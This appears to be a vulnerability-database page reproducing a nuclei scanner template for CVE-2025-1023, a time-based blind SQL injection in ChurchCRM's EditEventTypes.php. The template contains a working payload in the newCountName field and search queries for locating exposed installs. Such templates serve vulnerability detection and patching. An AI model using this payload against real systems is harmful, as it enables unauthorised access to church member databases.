Lucene search
+L

ChurchCRM - SQL Injection

🗓️ 27 Sep 2026 02:09:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

ChurchCRM prior to 5.13.0 has time-based blind injection in EditEventTypes via newCountName enabling arbitrary queries.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2025-1023
18 Feb 202510:17
–circl
cnnvd
CNNVD
ChurchCRM 安全漏洞
18 Feb 202500:00
–cnnvd
cve
CVE
CVE-2025-1023
18 Feb 202509:45
–cve
cvelist
Cvelist
CVE-2025-1023 SQL Injection in ChurchCRM newCountName Parameter via EditEventTypes.php
18 Feb 202509:45
–cvelist
euvd
EUVD
EUVD-2025-4527
3 Oct 202520:07
–euvd
nvd
NVD
CVE-2025-1023
18 Feb 202510:15
–nvd
ptsecurity
Positive Technologies
PT-2025-23483 · Undefined · Undefined
27 May 202500:00
–ptsecurity
ptsecurity
Positive Technologies
PT-2025-6821 · Churchcrm · Churchcrm
18 Feb 202500:00
–ptsecurity
rapid7
Rapid7 Vulnerability Database (full)
CVE-2025-1023: Improper Neutralization of Special Elements used in an SQL Command
18 Feb 202500:00
–rapid7
redhatcve
RedhatCVE
CVE-2025-1023
20 Feb 202510:23
–redhatcve
Rows per page
id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in ChurchCRM, leading to data exfiltration, modification, or deletion of church member information and potentially complete database compromise.
  remediation: |
    Upgrade to ChurchCRM version 5.13.1 or later that addresses the SQL injection vulnerability.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.02455
    epss-percentile: 0.83766
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4a0a00473045022100d467c76bc04ab3e0aa22f53fbb27abeac462ec201baa2f363e86c6bbbe16ccac02206ffca32a9d9b26f4da2278ab73072e0aff1df6c923d043be93f7fe0d29d091b9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Nov 2025 00:41Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 49.3
EPSS0.02455
SSVC
29